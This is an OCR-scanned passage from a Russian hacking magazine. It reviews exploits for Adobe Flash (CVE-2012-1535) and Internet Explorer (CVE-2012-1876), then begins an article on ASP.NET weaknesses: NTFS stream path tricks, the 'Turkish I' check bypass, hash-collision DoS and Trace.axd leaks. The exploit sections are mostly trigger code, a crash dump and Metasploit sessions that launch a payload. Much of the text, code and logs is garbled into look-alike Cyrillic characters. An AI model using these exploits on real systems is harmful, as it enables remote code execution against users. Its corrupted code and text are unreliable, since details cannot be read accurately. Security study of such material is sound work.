3. ПассивныеХББ были обнаружены в модулебеагсЬ (Шр:// 
депега І.[5Е РѴЕР] :1 339/зеа гсГі .ГіЕтІ), параметрахТШе и Ргісе. 

В результатеуспешной эксплуатации этихуязвимостей можно 
завладеть параметрами сессий пользователя, модератора 
или администратора. 



ТАК6ЕТ5 



РІупахбепегаІ СІаззіІіесІзѵА.ОСМБи, возможно, 
более ранниеверсии. 



50ЮТІ0Ы 



Установить последние обновления. 



ХАКЕР 10/165/2012 
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ВЗЛОМ/ОБЗОР ЭКСПЛОЙТОВ 



с АсІоЬе РІазІі РІауег уязвимость при обработке 
® ОТР-шрифтов 



СѴ55Ѵ2 9.3 



(АѴ: М/АС: М/Аи: М/С:С/І:С/А:С) 

мама 

Дата релиза: 17 августа 2012 года 
Автор: АІехапсІегбаѵгип, 5ІппЗг,]иап ѵагциег 
СѴЕ: СѴЕ-2012-1535 

Уязвимость в АсІіѵеХ-компоненте АсІоЬе РІазб РІауегверсий до 
11.3.300.271 была обнаружена в августе этого года. Использование в 
недрах 5ѴѴР сформированного специальным образом файла шрифта 
позволяет вы пол нить произвольный код на удаленной системе с 
правами пользователя, запустившего процесс. 



ЕХРЮІТ 



Уязвимаяфункция парсинга: 

риЫіс - Рипсіііоп Маіп О : ѵоісІІ 

1=ИІ5 . РопІіСІаББ = МаіпРопІіСІаББ : 
зирегО; 

Р6І5 . беар5ргаѵ( ) ; 

Р6І5 .Т ехРВІосксгеаІіеТехІіІ-іпеЕхатрІеО ; // И спользуется 
// шрифт, внедренный через МаіпРопРСІаББ 

Ь_ 

КлассМаіп_Роп1:СІа55 — расширение РопіАзБеІ для представле- 
ния шрифтов, внедренныхво РІазб-приложения. 

раскате { 

ітро гіі тх.соге.*; 

риЫіс сІазБ Маіп РопІіСІаББ ехІіепсІБ РопІіАББеІі { 

} 

} // раскате 

ФункцияТехіВІоск_сгеа1:еТех1:ипеЕхатрІесоздаетТех1:ВІоскс 
использованием встроенного шрифта со следующим содержимым: 
"ЕсІіибеѵѵогІсІ іп бех.". 

риЫіс -Рипсіііоп ТехРВІосксгеаІіеТехІіІ-іпеЕхатрІеО : ѵоісІ{ 
ѵаг _1оса11 ^У'Есіііі Рбе могісі іп бех . " ; 
ѵаг _1оса12: РопРОеБсгірІііоп = \ 

РопіОеБсгірііопС'РБрор" ) ; 



_1оса12.Роп1іІ_оокир = РопРІ_оокир. ЕМВЕООЕО_СРР; 
ѵаг ІосаІЗ: ЕІетепІіРогтаІі = пеы ЕІетепІіРогтаІіС 1оса12); 
ІосаІЗ .РопІіБіге = 16: 

ѵаг _1оса14:Тех1іЕ1етеп1і = пеш Тех1іЕ1етеп1і(_1оса11. \ 
ІосаІЗ) ; 

ѵаг ІосаІБ :Тех1іВ1оск = пеш ТехІіВІоскП : 

ІосаІБ . сопРепР = 1оса14; 

РбІБ. сгеаРеІ-іпеБС Іос аІБ) ; 

Ь- 

Ну и наконец, функция сгеаІеЫпеБ, где, собственно, и происходит 
падение, создает объектТехИтез со специальными координатами: 

ргіѵаРе -Рипсіііоп сгеаРеіЛпеБГ аг§1:ТехРВ1оск) : ѵоісІ{ 
ѵаг _1оса12:МитЬег = 300; 
ѵаг _1оса13:І\ІитЬег = 15; 
ѵаг 1оса14: ІМитЬег = 20; 

ѵаг 1оса15:ТехРІ_іпе = _ аг§1 . сгеаРеТехРІ_іпе(пи11, Л 

1оса12); 

_ыЫ1е_(_1оса15) { 

_1оса15.х = _1оса13; 

ІосаІБ. у = _1оса14; 

_1оса14 = (_1оса14 + (ІосаІБ . беі§бР + 2)); 
асІсІСбі1сІ(_1оса15); 

_1оса15^^_аг§1 . сгеаРеТехРІ_іпе(_1оса15., _1оса12)^ 

}; 

:ь_ 

После извлечения шрифта изВѴѴР-файла получаем падение: 

(538.7сІс): Ассезз ѵіоІаРіоп - сосіе С0000005 (РгбР сбапсе) 

еах=1еѲсІѲѲѲѲ еЬх=1е0с-р-р~РѲ есх=ѲѲѲ004Р7 ес!х=ѲѲѲѲѲѲѲѲ \ 
еБІ=02а7сІ-Ра0 есІі=02а78250 

еір=1044168а Ѳ5р=0013сІсІ20 еЬр=0013с!сІ 58 Іор1=0 \ 

пѵ ир еі рі П 2 па ре пс 

С5=001Ь 55=0023 сіб= 0023 е5=0023 -Рб=003Ь §5=0000 \ 

еП=00050206 

Р1а5б32_11_3_300_268 ! О1іипге§ІБРег5егѵег+0х285с28 : 
1044168а -Р-Р5008 саіі сіыогсі рііг [еах+8] \ 
сіб : 0023 : 1еѲсІѲѲѲ8= ? ??????? 

Вданном вариантеэксплойта применяетсятехника беарзргауіпд 
длязабивания памяти контролируемыми пользователемзначения- 
ми вплоть до 0x1 е0сІ0008, посему саіі бѵѵогсі ріг [еах+8] в нашем случае 
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Обзор эксплойтов 



пойдет по нужному нам пути. Пример эксплуатации описываемой 
уязвимости с полезной нагрузкой в виде калькулятора: 

Г П5-Г > изе ехрІоіі/мі пс Іоі у /з/Ьгоіл / зег/асІоЬеІІазІ і оІі-Г-РопІі 
тз-Р ехр1оі1і(асІоЬе_Р1а5Іі_о1і-Р_-Роп1і) > зеіі іаг§е1і 1 
іаг§е1і => 1 



тз-Р ехрІоіІіРасІоЬе -ГІазІі ОІ-Р -Ропіі) > зеіі игіраіііі ехт 
игіраіііі => ехт 

тз-Р ехр1оі1і(асІоЬе_РІа5Іі_о1і-Р_-Роп1і) > зеі: раѵіоасі \ 
ыіпсіоыз/ехес 



рауіоасі => ыіпсіоіл/з/ехес 

тз-Р ехрІоіІіРасІоЬе -ГІазІі ОІ-Р -Ропіі) > зеі: стсі саіс.ехе 
стсі => саіс.ехе 

тз-Р ехр1оі1і(асІоЬе_РІа5Іі_о1і-Р_-Роп1і) > зііоіл/ оріііопз 

Мосіиіе оріііопз (ехр1оіі/міпсІом5/Ьгом5ег/асІоЬе_Р1а5Іі_о1і-Р_-Роп1і) : 

Мате Сиггепі Беі: КедиігесІ йезсгіріііоп 



КОР БІлІР уез Используемая 

КОР-цепочка 
(допускаются : 

БІлІР. ЗКЕ) 

5КѴН05Т 0. 0.0.0 уез Локальный хост. Должен 

соответствовать адресу 
на локальной машине 
или 0.0. 0.0 



5КѴРОКТ 


8080 


ѵез 


Локальный порт 


для прослушивания 


55І_ 


-Раізе 


по 


Использовать 55І_ 



для входящих 
соединений 

551_СегЬ по Путь к используемому 

55І_- сертификату 
(по умолчанию будет 
сгенерирован 
автоматически) 

55І_Ѵегзіоп 55І_3 по Версия протокола 55І_ Л 

которая будет 
использоваться 
(допускаются: 551.2. 
551-3 . П51) 

ІІКІРАТН ехт по ІІКІ Л которая будет 

использоваться 
для эксплойта 
(по умолчанию 
генерируется случайно) 



Рауіоасі оріііопз (ыіпсіоыз/ехес) : 

Мате Сиппепі 5еі1ііп§ КедиігесІ йезсгіріііоп 



СМР саіс.ехе уез Команда 

для выполнения 

ЕХІТРІІМС ргосезз уез Тип выхода 

( зеРі ^ ІіІігеасІ., 
ргосезз., попе) 

Ехріоіі іаг§е1і: 

ІсІ Мате 



1 ІЕ б оп Ілііпсіоыз ХР 5РЗ 



тз-Р ехріоііі ( асІоЬе_-Р1а зИ_о1і-Р_-Роп1і ) > ехріоіі 
[*] Ехріоіі гиппіп§ аз Ьаск§гоипсІ ]'оЬ. 

[*] БІлІР І_оасІесІ : 31941 Ьуііез 

[*] ІІзіп^ ЦРИ : біііір : //0 . 0 . 0 . 0 : 8080/ехт 

[*] І_оса1 ІР: Иіііір : //192. 168.0. 77 :8080/ехт 

[*] Бегѵег зііагііесі. 



ІЫТЕКЫЕТ ЕХРЬОРЕР 
НЕВЕРНО ОБРАБАТЫВАЕТ 
ОБЪЕКТЫ В ПАМЯТИ. 

В РЕЗУЛЬТАТЕ УЯЗВИМОСТЬ 
ПОЗВОЛЯЕТ ВЫЗВАТЬ 
ПЕРЕПОЛНЕНИЕ БУФЕРА 



тзТ ехр1оіі(асІоЬе^азІі_о1і-р_-Роп1і) > [*] 192.168.0.77 V 



а сі о Ь е_П а з И_о1і -Р_-Ро п 1і - 11зег-а§еп1і : МогіІІа/4.0 
(сотоаІііЫе: М5ІЕ 6.0: Ілііпсіоыз N1 5.1: 5Ѵ1) 


г*і 


192.168.0.77 


асІоЬеРІазІіоІі-Р-РопІі - 


СНепі \ 




гериез1ііп§: 


/ехт 




Ш- 


192.168.0.77 


асІоЬеРІазІіоІі-Р-РопІі - 


5епсІіп§ НТМІ. 


1*1 


192.168.0.77 


асІоЬе Ріазіі оіі-р -Ропіі - 


ІІзег-адепІі: \ 


Мо2І11а/4.0 (сотраііЬІе: М5ІЕ 6.0: Ілііпсіоыз N1 5.1: 5Ѵ1) 


[*] 


192.168.0.77 


а сі о Ь е_-П а з М _о1і -р_-Ро п 1і - 


СНепі Л 




гедиезіііп^: 


/ехтУѴѴѵ. зы-р 




ЙІ 


192.168.0.77 


асІоЬеРІазІіоІі-Р-РопІі - 


Бепсііп^ БІлІР 


Ш- 


192.168.0.77 


асІоЬеРІазІіоІі-Р-РопІі - 


Цзег-а^епіі: \ 




МогіІІа/4.0 (сотраііЬІе: М5ІЕ 6.0: Ілііпсіоыз N1 5.1: 5Ѵ1) 


ш 


192.168.0.77 


асІоЬе Ріазіі оіі-р -Ропіі - 


СНепі \ 




гедиез1ііп§: 


/рауЛхХ. 




Ш- 


192.168.0.77 


асІоЬеРІазІіоІі-Р-РопІі - 


Бепсііп^ \ 




Рауіоасі 







ТАК6ЕТ5 



РІазЬ 11.3.300.268, РІазЬ 11.3.300.265, РІазЬ 11.3.300.257. 



50ШТІ0Ы 



Существует обновление, устраняющее данную уязвимость. 

Переполнение кучи в МісгозоН Іпіегпеі 
Ехріогег в модуле обработки СОІ_-элемента 
для фиксированной таблицы 



СѴ55Ѵ2 9.3 



(АѴ: Ы/АС: М/Аи: М/С:С/І:С/А:С) 

□пша 

Дата релиза: 2 августа 2012 года 

Автор: АІехапбге РеІІеІіег, тг_те, Ьіпр, 5ІппЗг,щап 

СѴЕ: СѴЕ-2012-1876 

МісгозоН Іпіегпеі Ехріогег версий с 6 по 9, а также версия 
ЮСопзитег Ргеѵіеѵѵ ненадлежащим образом производит 
обработку объектов в памяти. Это позволяет уда лен ному 
атакующему выполнить произвольный код путем получения 
доступа к несуществующему объекту, что приводит к перепол- 
нению буфера на куче. Уязвимость была продемонстрирована 
командой ѴІІРЕЫ на кон курсе Рѵѵп20ѵѵп в рамках конференции 
СапБесѴѴезІ в 2012 году. 



ЕХРЮІТ 



Эта критическая уязвимость присутствует во всех версиях МісгозоН 
Іпіегпеі: Ехріогег, включая ІЕЮ подуправлением ѴѴіпсІоѵѵз 8. Воз- 
никаетона в результате ошибки переполнения кучи, которая может 
быть вызвана следующим фрагментом кода: 
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ВЗЛОМ/ОБЗОР ЭКСПЛОЙТОВ 




Фаъ йгі 



СоиШгу: 5«і«і 

Сі^ мсмАпішіч 

Рпйгп: 

То: 

Ілапк 

Тор КаіесІ 



3 

3 



ИфшІіЧ : «5М П ЫЛіЩ 
І Дігютп.-и^яіп-іигт І: Сітоі 
№4 »і№ №>Ч ИііЦ* - 
^СвЙСГІ ЛІГГОГЗѴ КПІ (ОЧіЬріЛ. 

«шил лі /ѵнУтѵн/Мрйч іі 
. , йдігнтчіп_р*ір:І} (п /ѵл г/тѵѵѵ 
/ЬЬрдіЧлІ/ ГодІ птаііі.ріір дп » 
1 

ѴѴеІсоте 



Н№ Л ^КгАИг 



Вся информация 
предоставлена 
исключительно 
в ознакомительных 
целях. Ни редакция, 
ни автор не несут 
ответственности 
за любой возможный 
вред, причиненный 
материалами данной 
статьи. 



ПримерэксплуатацииБОЫ 

вНоіеІВоокіпдРогІаІ 



< И1:т1 > 

< Ьосіу > 

<іаЬ1е 5іу1е="1:аЫе-1ауои1: :бхесГ > 

<со1 ісІ= " 132^ \л/ісІ1:И= "41 " зрап="1^>&пЬзр </со1> 

</1:аЫе> 

<зсгірі> 



-Рипсііоп оѵег_Тгібб ег () { 

ѵаг оЬ]*_со 1 = сіоситепі . ^еіЕІетепіВуІсК "132" ) ; 
°Ьэ_со1 .місіііі = "42765"з 
°Ьэ_со1.5рап = 1000; 

Ь- 



зеіТітеоиіР "оѵег_ігі§§ег( ) ; " Л) ; 



</зсгір1:> 

</ЬосІу> 

</И1:т1> 

Пример использования модуля из состава МеІазрІоП; для данной 
уязвимости: 

гпБ-Р > іізе ехр1оі1:/ыіпсІоы5/Ьгоы5еп/т5І2_037_іе_соІ5рап 
тзТ ехр1огЦт5І2_037_іе_со1зрап) > зеі: и г іра1:М ехт 
и г іра1:М => ехт 

тз-Р ехр1оіі(тз12 037 іе соізрап) > зеі: раѵіоасі \ 
міпсіомз/ехес 
раѵіоасі => шіпсіошз/ехес 

тз-Р ехр1оіі(тз12_037_іе_соІ5рап) > зеі: стсі саіс.ехе 
стсі => саіс.ехе 

тз-Р ехр1оіі(т5І2 037 іе соізрап) > зііоы оріііопз 
Мосіиіе оріііопз (ехрІоіі/міпсІоыз/Ьгоызег/ \ 
тз12_Ѳ37_іе_со1зрап) : 

ІМате Сиггепі: БеТТіпд КедиігесІ Резсгіріііоп 



0ВРІІ5САТЕ -Раізе по Включить 

обфускацию 

ЗаѵаБсгі рІ: 

5КѴН05Т 0.0. 0.0 уез Локальный хост. 

Должен 

соответствовать 

адресу 

на локальной 
машине или 0.0. 0.0 

5КѴР0КТ 8080 уез Локальный порт 

для прослушивания 



551- Таізе по Использовать 55І_ 

для входящих 
соединений 

55І_Сег1: по Путь 

к используемому 
55І_ -сертификату 
(по умолчанию 
будет сгенерирован 
автоматически) 

55І_Ѵегзіоп 55І_3 по Версия протокола 

55Б Л которая будет 
использоваться 
(допускаются : 

551-2. 5513 . Т151) 

ЦКІРАТН ехт по ІІКІ . которая будет 

использоваться 
для эксплойта 
(по умолчанию 
генерируется 
случайно) 



Рауіоасі орііопз (ыіпсіоыз/ехес) : 

ІМате Сиггепі: 5еі1:іп§ КедиігесІ Резсгірііоп 



СМР саіс.ехе уез Команда 

для выполнения 

ЕХІТРІЛМС ргосезз уез Тип выхода 

(зеІід_1:ІіпеасІ і 
ргосезз^ попе) 



Ехріоіі іаг^еі: 
ІсІ Мате 



0 Аиіотаііс 



тз-Р ехр1оіі(тз12_037_іе_со1зрап) > ехріоіі: 
[*] Ехріоіі гиппіп§ аз Ьаск§гоипсІ ]'оЬ. 

[*] ІІзіп^ ЦКБ: Іііір : //0 . 0 . 0 . 0 : 8080/ехт 
[*] І_оса1 ІР: Іііір: //192. 168.0. 77 :8Ѳ8Ѳ/ехт 

[*] 5егѵег зіагіесі. 



ТАР6ЕТ5 



МісгозоЙ Іпіегпеі Ехріогег 6— 9, ІЕ 10 СопзитегРгеѵіеѵѵ. 



50ШТІ0М 



Существует обновление, устраняющее данную уязвимость. □С 
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Владимир Кочетков, Робіііѵѳ ТесНпоІодіез (іѵѵіНег.сот/косЬеІкоѵ_ѵ) 




СЛОЖНО, НО МОЖНО! 



ХАРДКОРНЫЙ РАЗБОР УЯЗВИМОСТЕЙ ВЕБ- 
ПРИЛОЖЕНИЙ НА БАЗЕ ТЕХНОЛОГИИ А5Р.ИЕТ. 
ТАК ЛИ БЕЗОПАСНА ПЛАТФОРМА МЕЛКОМЯГКИХ? 



Анализ защищенности веб-приложений 
АЗР.ИЕТ/МѴС — это практически всегда вызов 
для пентестера, который зачастую вынужден 
собирать сценарий атаки из небольшого 
числа допущенных разработчиками 
незначительных ошибок. В отличие от хорошо 
изученной платформы І_АМР, инфраструктура 
.ИЕТ-приложений фактически является 
белым пятном на картах исследователей 
безопасности. Пора расколоть орешек. 



ІИТРО 

Согласно данным отчета «Статистика уязвимостей веб-приложений 
за 2010-2011 годы» ( ЬіСІѵ/Л_51Р0 ), подготовленного специалистами 
исследовательского центра Розіііѵе ТесЬпоІодіез, фреймворк А5Р. 
ІМЕТ занимает второе место по распространенности, уступая лишь 
РНР-приложениям. При этом в отчете отмечается рекордно малый 
процент приложений А5Р.ІМЕТ, подверженных критическим уяз- 
вимостям (таким как 05 Соттапсііпд, РаіЬ ТгаѵегзаІ, 501 Іщесііоп 
и так далее). Этому есть разумное объяснение: в А5Р.ІМЕТ заложено 
достаточно много механизмов, использование которых позволяет 
А5Р.І\ІЕТ-разработчику прикладывать значительно меньше усилий 
для создания безопасного приложения, чем разработчику под 
какой-либо другой из существующих фреймворков. Ктаким меха- 
низмам можно отнести использование языков со строгой статиче- 
ской типизацией и виртуальной среды, гарантирующей безопасное 
выполнение кода, следование принципу зесиге Ьу сіе^аиіі, наличие 
в стандартной библиотеке платформы .ІМЕТ повторно используе- 



мых механизмов обеспечения безопасности и так далее. Многие, 
увидев издалека платформу от МісгозоЙ, отмахиваются и даже 
не пробуют с ней повозиться — слишком много гемора. Впрочем, 
сложности всегда сильно преувеличены. При разработке и анализе 
защищенности возможны ситуации, когда специфика платфор- 
мы .ЫЕТ, ОС ѴѴіпсІоѵѵз и окружения веб-приложений остаются без 
внимания разработчиков и пентестеров, что приводит к появлению 
в таких приложениях уязвимостей, получающих впоследствии 
статус критических. Мы решили проанализировать несколько по- 
добных ситуаций. 

ХОРОШО ЗАБЫТОЕ СТАРОЕ: РАБОТА С ФАЙЛАМИ 

Важная особенность приложений на А5Р.ІМЕТ — они имеют дело 
с виндой, а значит, с файловой системой ІМТР5. Спроектированная 
с учетом обеспечения обратной совместимости с РАТ и НРР5, ІМТР5 
является одной из наиболее сложных файловых систем из числа 
представленных в инфраструктуре ѴѴѴѴѴѴ. Система обладает мас- 
сой неоднозначностей и слабо документированных возможностей. 
Более того, существующие в ѴѴіпсІоѵѵз АРІ интерфейсы взаимодей- 
ствия с файловой системой не только не скрывают неоднознач- 
ности, позволяя, например, адресовать один и тот же каталог или 
файл сразу несколькими способами, но еще и добавляют собствен- 
ную специфику работы с файлами. Особенности работы с файлами 
вполне могут пригодиться как при обходе фильтров или правил, 
реализованных непосредственно в веб-приложении, так и при 
эксплуатации уязвимостей класса І_осаІ Рііе Іпсіизіоп. Мы не будем 
вспоминать сейчас все особенности системы (шпаргалку можешь 
найти на нашем диске). Коснусь только одной особенности — ме- 
таатрибутов и альтернативных потоков данных. 

Далеко не всем (во всяком случае, в мире веб-технологий) 
известно, что каждая сущность в ІМТР5 определяется набором 
атрибутов (так называемые метаатрибуты), к которым можно обра- 
титься, используя расширенный синтаксис имен ІМТР5 с указанием 
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имени и типа метаатрибута в формате: \ОігесІогу:<Ыате>:<Туре>\ 
РіІе:<Мате>:<Туре>. Наиболее интересны с точки зрения эксплуа- 
тации уязвимостей в веб-инфраструктурах метаатрибуты $0АТА 
и $ІМ0ЕХ_АІ_І_0САТІ0М (см. таблицу). Первый позволяет обратиться 
к основному потоку данных файла, то есть к его содержимому. 
Второй — к содержимому каталога, точнее, к списку его подката- 
логов. Иными словами, оба метаатрибута предоставляют альтер- 
нативный способ обращения к сущностям файловой системы. Так, 
полное имя С:\ѴѴіпсІоѵѵ5:$І30:$І N ОЕХ_АИОСАТЮМ\Ып.ехе эквива- 
лентно традиционному С:\ѴѴіпсІоѵѵ5\Ы~і.ехе, а С:\ѴѴіпсІоѵѵ5\поІерасІ. 
ехе::$0АТА означает то же, что и С:\ѴѴіпсІоѵѵ5\поІерасІ.ехе. 

Казалось бы, в реализациях веб-серверов и веб-фреймворков 
данная специфика уже давно учтена... Однако при подготовке 
материалов, которые легли в основу этой статьи, в последних 
версиях веб-сервера пдіпх была обнаружена уязвимость РТ-2012- 
06, позволявшая атакующему обойти возможные ограничения на 
доступ к каталогам, обращаясь к ним при помощи расширенного 
синтаксиса метаатрибутов ІМТР5 ( ЬіІ.Іу/КдкаРР ). Это лишний раз 
подтверждает необходимость учитывать при разработке и анали- 
зе веб-приложений любую специфику окружения, даже если она 
кажется безнадежно устаревшей. 

КУЛЬТУРНЫЙ АСПЕКТ. ТІІРКІ5Н I 

Чтобы понять суть следующей уязвимости, нужно вспомнить про 
понятие «культура» в .ЫЕТ Егатеѵѵогк. Под ним подразумевается 
набор предпочтений, основанный на языке и культурных традициях, 
таких как региональные настройки (например, валюта), используе- 
мый алфавит, система мер и тому подобные. Платформа .ЫЕТ предо- 
ставляет разработчику весь спектр средств для реализации под- 
держки в приложениях сразу нескольких культур. В частности, это 
выражается в учете текущей культуры при различных операциях 
со строковыми типами. С другой стороны, А5Р.ЫЕТ предоставляет 
возможность включения автоматического определения культуры на 
основе данных, переданных браузером клиента в НТТР-заголовке 
АссерМапдиаде. Данная функция может быть использована как 
для всего сайта, так и для его отдельных страниц. 

Однако из-за существенных отличий ряда культур это может 
привести к тому, что обработка строк в приложении может осу- 
ществляться не так, как это было задумано разработчиком. Так, 
в алфавитах культур, использующих английский язык, определена 
только одна пара букв І/і (строчная и прописная). В то же время 
в алфавите турецкой культуры таких пар две и ни одна из них 
не совпадает с английской: (І/і и І/і). В следующем примере страни- 
цы А5Р.ІМЕТ включено автоматическое определение культуры: 

<%@ Ра^е 1ап^иа^е="С#" Си11=иге="Аи1=о" %> 

<%@ Ітрогі: Мате5расе="5ѵ5І:ет.61оЬа1І2а1:іоп" %> 

< ! РОСТУРЕ И1=т1> 



Г 




■* |дщц; ’ 'ічічнддн 



ИТТРД.1 4П і РпгйШйгп 

Іргипг п|; і пзе/1 . 3 



ІКИШ -/ . іѵг ■' { 



I 




І ІІЛ^І, НІЧЫИ -Л ЩфЛЛ і I I ІШІ ЧѴЛЛшѵЛ Г*| ? ІІЛ 

Обход ограничений на доступ к каталогам 




Распределение элементов в хеш-таблице 



<зсгір1: гипа1:= ,, 5егѵеп ,, > 



і-р ( , Кедие5І=["тосІе"] .ТоЬоыегП != "асішіп"’) 



і-р ( 51:гіп^.Сотраге(Кедие5І:["ра1:Іі"1’) , "Р НЕ: " . в, 5. •ргие) 



При этом сравнение строк идет без учета текущей культуры, 
определенной из полученного НТТР-заголовка запроса браузера. 

В том случае, если атакующий укажет в нем культуру Іг-ТР, он смо- 
жет обойти проверки, реализованные в выражениях условных 
операторов. Эта проблема получила название «ТигкізЬ I», хотя 
встречается далеко не только в турецкой культуре (аналогичного 
эффекта можно достичь, и используя, например, азербайджанскую 
культуру аг-А2). При анализе веб-приложения проблему можно 
выявить, если передать в заголовке АссерМапдиаде «спорные» 
культуры с одновременным использованием неоднозначных 
символов в строковых параметрах. При анализе исходного кода 
необходимо обратить внимание на инвариантность логики работы 
со строковыми данными в страницах, для которых включено авто- 
матическое определение культуры. 

КОЛЛИЗИИ ХЕШЕЙ 

Важная особенность .ЫЕТ Егатеѵѵогк: любой класс здесь является 
наследником класса 5у5Іет.0Ь)есІ, определяющего небольшой 
базовый набор методов, общих для любой иерархии объектов. 

В число таких методов входит ВеЖазЬСосІеО, возвращающий 
целочисленный хеш-код конкретного объекта, который может 
принимать значения от -2 147 483 648 до 2 147 483 647. Этот метод 
используется для реализации структур данных, основанных на 
хеш-таблицах, и при сравнении объектов одного типа друг с дру- 
гом. Несложно подсчитать, что в соответствии с парадоксом дней 
рождения уже при 64 тысячах хешей вероятность появления кол- 
лизии в них составляет 50%. На практике же генерация большого 
количества объектов в .ЫЕТ с одним и тем же хеш-кодом не явля- 
ется трудноразрешимой задачей, по крайней мере для строковых 
типов: используя алгоритмический подход «встреча посередине», 
можно получить несколько тысяч таких строк за вполне приемле- 
мое время. 

В А5Р.ІМЕТ данные форм, получаемые в Р05Т-запросах, а также 
параметры из ІІРІ_, соокіез и данные сессии хранятся в объектах 
класса ВузІет.СоІІесІіопз.ВресіаІігесШатеѴаІиеСоІІесІіоп, пред- 
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ставляющего собой, по сути, реализацию хеш-таблицы. Распре- 
деление элементов в таких таблицах при штатной работе веб- 
приложения представлено на предыдущей странице. 

В качестве ключевых значений в них выступают хеш-коды имен 
параметров, вычисляемые по алгоритму: 

-Рог (; 1еп§1іЬ > 0; 1еп§1іЬ -=1 ) { 

РіазРі = (ЬазЬ л 5и-Рбх[1еп^1:И - 1]) * 1Ѳ412Ѳ4193 ; 

Ь_ 

Однако если хеш-код имен параметров запроса (являющихся 
объектами строкового типа) будет одинаков для всех параметров, 
то наша хеш-таблица примет вид, представленный на рисунке 
ниже. 

В этом случае на вставку каждого элемента таблицы будет 
уходить все больше времени из-за необходимости обработать воз- 
никшую коллизию, чтобы обеспечить доступ к этому элементу по 
его ключу в дальнейшем. При получении запроса с большим коли- 
чеством подобных параметров их обработка займет все процессор- 
ное время и сделает веб-приложение недоступным на период их 
обработки. Именно это особенность, продемонстрированная в ис- 
следовании Александра Клинка (АІехапбег «аіесб» КІіпк) и Джу- 
лиана Вэльде (^иIіап «гегі» ѴѴаІсІе) — іЕІѵА/ѵОТТ . впоследствии 
получила статус уязвимости класса «Условия йо5» М511-100. 

Устранена эта уязвимость была достаточно «оригинально»: 
теперь в конфигурации по умолчанию А5Р.ІМЕТ отклоняет обработку 
НТТР Р05Т запроса, если количество параметров в нем превышает 
1000. У разработчиков есть возможность какусилить, так и ослабить 
данное ограничение через опцию в файле конфигурации ѵѵеЬ.сопПд: 

<арр5е1і1ііп§5> 

<асІсІ кеу="а5рпе1і гМахНІ^рСоІІесІііопКеуБ" \ 

ѵа1ие="5оте питЬег Ьеге"/> 

</аррЗе1і1ііп§5> 

Протестировать подверженность данной уязвимости при анали- 
зе защищенности веб-приложения легко: достаточно отправить 
Р05Т-запрос с количеством параметров, превышающим возмож- 
ные установленные ограничения. Также следует обратить внима- 
ние на любые коллекции данных, принимаемые веб-приложением, 
которые допускают наличие в них большого числа именованных 
элементов. При анализе кода необходимо тщательно изучить 
переопределенные реализации метода СеЖазЬСосІеП объектов, 
используемых в хеш-таблицах, на предмет равномерности распре- 
деления генерируемых ими хеш-кодов. 

Другая достаточно часто встречающаяся ошибка — использова- 
ние хеш-кодов объектов в качестве их уникального идентификатора. 
Очевидно, что если атакующему удастся сгенерировать сторонний 
объект с хеш-кодом, совпадающим с кодом какого-либо существую- 
щего объекта, то это, возможно, позволит ему обойти реализованные 
проверки или нарушить работу приложения. Таким образом, при ана- 
лизе кода необходимо также убедиться в том, что хеш-коды объектов 




не используются в качестве идентификаторов объектов и не фигури- 
руют в коде в качестве аргументов каких-либо операций, подразуме- 
вающих ихуникальность. В примере, приведенном в листинге ниже, 
класс, реализующий логику работы с учетными записями пользова- 
телей, позволяет атакующему представиться приложению другим 
пользователем. Для этого ему необходимо лишь подобрать такое 
значение имени ІМате, которое в совокупности с идентификатором Ісі 
даст хеш-код, идентичный хеш-коду атакуемой учетной записи. 

СІЭ55 ІІБѲГІПБІіаПСе 

{ 

риЬІіс іпі Ісі; 

риЬІіс 5ігіп% ІМате; 



риЬІіс 5І=а1=іс Ьооі орегаііог == (ІІБегІпБІіапсе а. \ 
ЦзегІпз'Еапсе Ь) 

і_ 

геііигп а .СіеІіНазЬСосІеО == Ь .Се1іНа5ЬСосІе( ) ; 

-Ь- 

риЬІіс зііаіііс Ьооі орегаііог ! =(ІІ5егІп5Ііапсе а д \ 
ІІзегІпвіапсе Ь) 

і_ 

геііигп ! (а == Ь^) : 

} 



риЬІіс о ѵеггісі е Ьооі ЕдиаІ5(оЬдес1і оЬд) 
геііигп іЬіб = = (ІІ5егІп5Ііапсе)оЬд ; 

-Ь- 



риЬІіс о ѵеггісі е іпі С іеІіНазЬСосІеО 

і_ 

геііигп (іЬіб.ісі.ТоЗігіп^С) + іЬіз.Мате.ТоІ-ОщегО) . \ 
СеіИавЬСосІеО ; 



} 

СПЕЦИФИКА А5РЖТ/МѴС 

СТАНДАРТНЫЕ НТТР-ОБРАБОТЧИКИ 

Одной из особенностей архитектуры стека А5Р.ІМЕТ являются так 
называемые НТТР-обработчики — программные модули, отве- 
чающие за обработку запросов к какому-либо контенту или типу 
контента. В стандартный набор входят обработчики документов 
с расширениями азрх, азЬх, азпгіх и тому подобными. Среди них 
есть несколько обработчиков, достаточно интересных с точки 
зрения анализа защищенности. 

Обработчик Тгасе.ахсІ позволяет осуществлять трассировку 
работы веб-приложения как из браузера, так и из специали- 
зированных утилит либо модулей интегрированных сред раз- 
работки. По умолчанию этот обработчик недоступен в Реіеазе- 
конфигурации веб-приложения, однако часто включается 
разработчиками для отладки работы продуктивной среды (трас- 
сировка в этом случае может быть разрешена как для отдельных 
страниц, так и для всего приложения в целом). 

По сути, трассировочная информация аналогична выводимой 
функцией рЬріпіоП в РНР-приложениях, но может быть получена 
для произвольного запроса. 

Благодаря тому что в ответе Тгасе.ахсІ отражаются все данные 
запроса (включая значения заголовков, полей форм и тому подоб- 
ные), этот обработчик, помимо раскрытия достаточно большого 
количества информации стороны сервера, может быть использо- 
ван и для перехвата данных, недоступных для клиентских сцена- 
риев при эксплуатации Х55 (например, соокіез с флагом ШрОпІу). 

Более подробную информацию о возможностях трассировки 
веб-приложений А5Р.ІМЕТ можно получить в соответствующем раз- 
деле МБРИ ( Ьіі.Іѵ/ЦеРООБ ). 
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Вероятно, наиболее «нашумевшими» обработчиками яв- 
ляются ѴѴеЬРезоигсе.ахсІ и БсгіріРезоигсе.ахсІ. И тот и другой 
предназначен для получения статических ресурсов приложения. 
Существенная разница между ними заключается лишь в том, что 
первый позволяет получать ресурсы только из бинарных сборок 
веб-приложения, а второй еще и файловые ресурсы, хранящиеся 
на диске. В обоих случаях схема их использования идентична: 
Шр://Но5Іпате/*Ве5оигсе.ахб?б=<ге5оигсеИ>&1=<{іте5Іатр>, 
где 6 — идентификатор ресурса, представляющий собой Вазе64- 
кодированную строку, зашифрованную симметричным ключом, 
хранящимся на стороне сервера (так называемый тасЫпе кеу, ис- 
пользуемый для шифрования чувствительных данных, передавае- 
мых на клиентскую сторону); I — временная метка, необходимая 
для обеспечения работы механизма кеширования. Сама строка 
представляет собой перечисление всех запрашиваемых ресурсов, 
